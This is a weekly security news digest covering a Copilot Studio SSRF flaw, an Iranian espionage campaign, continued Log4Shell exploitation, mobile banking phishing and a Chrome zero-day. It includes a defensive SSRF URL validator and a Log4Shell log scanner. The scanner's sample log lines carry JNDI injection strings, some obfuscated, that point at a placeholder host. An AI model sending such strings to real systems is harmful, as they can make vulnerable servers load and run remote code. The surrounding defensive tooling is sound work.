Chrome zero-day fix, MS Copilot, Log4Shell still being exploited
Notable news for the week of Aug 18-24th, 2024. This week, your editor is Lior from the F5 Security Incident Response Team. Going over the news, I have found that everyone is busy. Google fixes its ninth actively exploited Chrome zero-day in 2024, providing job security for the products SIRT (the vulnerability management group). Remember the Log4Shell vulnerability from two years ago? It is still being exploited! To me this always seems strange, but it looks like installing or not patching old software is also okay for anyone who decides to use software without checking for weaknesses. So, the person who installed it will be busy fixing it. Like every week, there are always new attacks. This week we have one that is very popular with phishing techniques, and while we talk about AI, Copilot Studio had a vulnerability that ended up with information disclosure. So yes, everyone is busy in the security industry. Which, I guess, is not a bad thing?!?! Until next time, keep it safe. Lior.
Microsoft Copilot Studio Exploit Leaks Sensitive Cloud Data
Just for fun, I asked Copilot to summarize this article; this is what it wrote:
Introduction
In a recent discovery, security researchers identified a critical vulnerability in Microsoft’s Copilot Studio, a tool designed for creating custom AI chatbots. This flaw, tracked as CVE-2024-38206, has significant implications for cloud security and data privacy.
The Vulnerability
The vulnerability is a server-side request forgery (SSRF) bug that allows authenticated attackers to make external HTTP requests. This exploit can access sensitive information across multiple tenants within cloud environments.
Impact and Risks
While no cross-tenant information was immediately accessible, the shared infrastructure among tenants magnifies the risk.
Microsoft’s Response
Microsoft acted swiftly upon notification of the flaw, fully mitigating the issue with no action required from Copilot Studio users.
Conclusion
This incident highlights the critical need for robust security practices in developing and deploying AI tools. As organizations increasingly rely on cloud-based solutions, ensuring the security of these environments is paramount.
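The SSRF class described above comes down to a service fetching a URL on behalf of a user without checking where that URL actually points. The following is an added example, not Microsoft's code and not how Copilot Studio was fixed: a defensive validator that an outbound connector can run before making a request. It assumes only HTTPS to public hosts is legitimate (ALLOWED_SCHEMES), and it takes an injectable resolver so the check can be exercised offline with a constructed DNS table (FAKE_DNS, fake_resolver); those names are mine, not from the article.

```python
import ipaddress
import socket
from typing import Callable
from urllib.parse import urlsplit

# Policy assumption for this example: the connector only ever needs public HTTPS.
ALLOWED_SCHEMES = {"https"}


def _system_resolver(host: str) -> list[str]:
    """Resolve a hostname to every A/AAAA address the OS returns."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_public(ip) -> bool:
    """True only for routable public addresses. Blocks loopback, RFC 1918,
    link-local (which covers cloud metadata endpoints in 169.254.0.0/16),
    multicast, reserved and unspecified ranges."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 is really 10.0.0.1
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str,
                       resolver: Callable[[str], list[str]] = _system_resolver
                       ) -> tuple[bool, str]:
    """Return (allowed, reason) for a user-supplied URL the service would fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [ipaddress.ip_address(host)]  # literal IP in the URL
    except ValueError:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return False, f"cannot resolve {host!r}"
    if not addresses:
        return False, f"no addresses for {host!r}"
    # Every address must pass: a name with one public and one internal record is rejected.
    for ip in addresses:
        if not _is_public(ip):
            return False, f"{host!r} maps to non-public address {ip}"
    return True, "ok"


# Constructed DNS table so the example runs offline (hypothetical hosts).
FAKE_DNS = {
    "api.example": ["93.184.216.34"],
    "internal.example": ["10.1.2.3"],
    "dual.example": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolver(host: str) -> list[str]:
    """Stand-in for _system_resolver backed by FAKE_DNS."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver: unknown host {host}")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for candidate in ("https://api.example/v1",
                      "http://api.example/v1",
                      "https://169.254.169.254/latest/meta-data/",
                      "https://[::ffff:10.0.0.1]/",
                      "https://internal.example/",
                      "https://dual.example/",
                      "https://user:pw@api.example/"):
        print(f"{candidate:45} -> {check_outbound_url(candidate, fake_resolver)}")
```

Two caveats a practitioner would add: the address that passed the check must be the one the HTTP client actually connects to (connect to the vetted IP and set the Host header, or re-resolve inside the client with the same policy), otherwise a DNS answer that changes between the check and the fetch defeats it; and redirects must either be disabled or have each hop re-validated with the same function.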
Meta Exposes Iranian Hacker Group Targeting Global Political Figures on WhatsApp
Meta, the parent company of Facebook, has uncovered and exposed a sophisticated cyber-espionage campaign orchestrated by an Iranian hacker group known as 'Tortoiseshell'. This group has been active since at least 2018 and is believed to be linked to Iran's Islamic Revolutionary Guard Corps (IRGC).
The hackers primarily targeted military personnel and defense companies in the U.S. and Middle East. They used fake online personas on social media platforms like Facebook, LinkedIn, and Instagram to connect with their targets and build trust. Once a relationship was established, they would direct their targets to malicious websites or send them malware-infected files.
Meta's investigation revealed that "Tortoiseshell" (tracked as UNC1549 by Google and Imperial Kitten by CrowdStrike) employed a variety of techniques, including social engineering, credential harvesting, and the deployment of custom malware. Meta disrupted the group by removing its accounts and sharing its findings with industry partners and law enforcement.
This discovery underscores the persistent threat from state-sponsored cyber-espionage groups, and the need for vigilance and strong security controls to protect sensitive information and infrastructure.
https://thehackernews.com/2024/08/meta-exposes-iranian-hacker-group.html
Two Years On, Log4Shell Vulnerability Still Being Exploited to Deploy Malware
Two years after its disclosure, the Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j logging library is still being used by cybercriminals to deploy malware. Despite widespread awareness and patching efforts, many systems remain unpatched and exposed to attack.
The Log4Shell flaw is particularly dangerous because it allows for remote code execution, meaning attackers can run arbitrary code on affected systems. This has led to a variety of malicious activities, including the deployment of ransomware, cryptojackers, and botnets.
The article highlights that attackers are using this vulnerability to target a range of industries, including finance, healthcare, and technology. Security researchers have observed a continuous stream of exploitation attempts, indicating that the threat remains persistent and widespread.
Organizations are advised to make sure their systems have the latest security patches, and to apply compensating controls such as network segmentation, intrusion detection systems, and continuous monitoring to reduce the risk from Log4Shell.
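The "intrusion detection" and "continuous monitoring" advice above is concrete enough to show in code. This is an added example, not from the article: a small scanner that reads web-server access log lines and flags the JNDI lookup string that Log4Shell exploitation attempts carry, after undoing URL-encoding and the Log4j lookup forms (${lower:x}, ${upper:x}, ${anything:-x}) that published detection rules resolve because they are used to hide the literal text. The log lines in SAMPLE_LOG are constructed, using documentation-range addresses, and the function names are mine.

```python
import re
from urllib.parse import unquote

# Log4j 2.x lookup forms that evaluate to a plain character and are used to
# break up the string "jndi" in request fields so that naive matching misses it.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")          # ${anything:-x} -> x
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)  # ${lower:X} -> x
# The lookup that Log4Shell abuses: ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_case(match: re.Match) -> str:
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def normalize(text: str) -> str:
    """Undo (possibly doubled) URL-encoding and resolve innermost lookups
    until the text stops changing, with a bound so crafted input cannot loop."""
    text = unquote(unquote(text))
    for _ in range(10):
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        new = _CASE_LOOKUP.sub(_resolve_case, new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line: str) -> list[str]:
    """Return the JNDI protocol names (ldap, rmi, dns, ...) found in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, protocols) for every line that carries a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        protocols = find_jndi_lookups(line)
        if protocols:
            hits.append((index, protocols))
    return hits


# Constructed Apache-style access log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.10 - - [20/Aug/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [20/Aug/2024:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [20/Aug/2024:10:01:04 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.5%2Fb%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.13 - - [20/Aug/2024:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-d}ns://203.0.113.5/c}"',
    '203.0.113.14 - - [20/Aug/2024:10:01:06 +0000] "GET /docs?path=${HOME}/readme HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for index, protocols in scan(SAMPLE_LOG):
        print(f"line {index}: JNDI lookup via {', '.join(protocols)}")
        print("   ", SAMPLE_LOG[index])
```

A match in an access log means an attempt was made, not that it succeeded; the line to correlate it with is the outbound connection (LDAP, RMI or DNS) from the application host to the address in the lookup, which is what distinguishes an unpatched, exploited system from background scanning.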
New Phishing Technique Bypasses Security on iOS and Android to Steal Bank Credentials
A newly identified phishing technique is successfully bypassing security measures on both iOS and Android devices to steal bank credentials. This method uses malicious apps that are disguised as legitimate applications and are often distributed through unofficial app stores or phishing websites.
Once installed, these malicious apps use sophisticated overlay attacks to display fake login screens when users open their banking apps. The fake screens are almost indistinguishable from the real ones, tricking users into entering their sensitive information, such as usernames, passwords, and two-factor authentication codes.
The method is effective because it abuses the accessibility features built into mobile operating systems. These features exist to assist people with disabilities, but they can be turned against the user: the attackers also use them to intercept SMS messages, further undermining SMS-based two-factor authentication.
Security experts recommend that users download apps only from official app stores, be cautious about granting apps broad permissions, and keep their devices updated with the latest security patches. Enabling features such as Google Play Protect and using mobile security software can also help mitigate these risks.
The article underscores the evolving nature of phishing attacks and the importance of user awareness and robust security practices to protect sensitive financial information on mobile devices.
Google fixes ninth Chrome zero-day tagged as exploited this year
Google has released an update to address the ninth actively exploited zero-day vulnerability in its Chrome web browser for the year 2024. The vulnerability was discovered to be actively exploited in the wild, posing a significant security risk to users.
The zero-day affects the browser's V8 JavaScript engine, which processes JavaScript code. If exploited, it could allow attackers to execute arbitrary code on a victim's machine, leading to data breaches, system compromise, and further damage.
Google's security team quickly responded to the discovery by releasing a patch to fix the vulnerability. Users are strongly advised to update their Chrome browsers to the latest version immediately to protect against potential exploitation. The company has also rolled out the update to the stable channel, ensuring that it reaches as many users as possible.
The article shows how important it is to keep software up to date, and that Google fixes security problems quickly to protect its users. It is also a reminder of the ongoing threat from zero-day vulnerabilities and the need for vigilance in maintaining strong cybersecurity practices.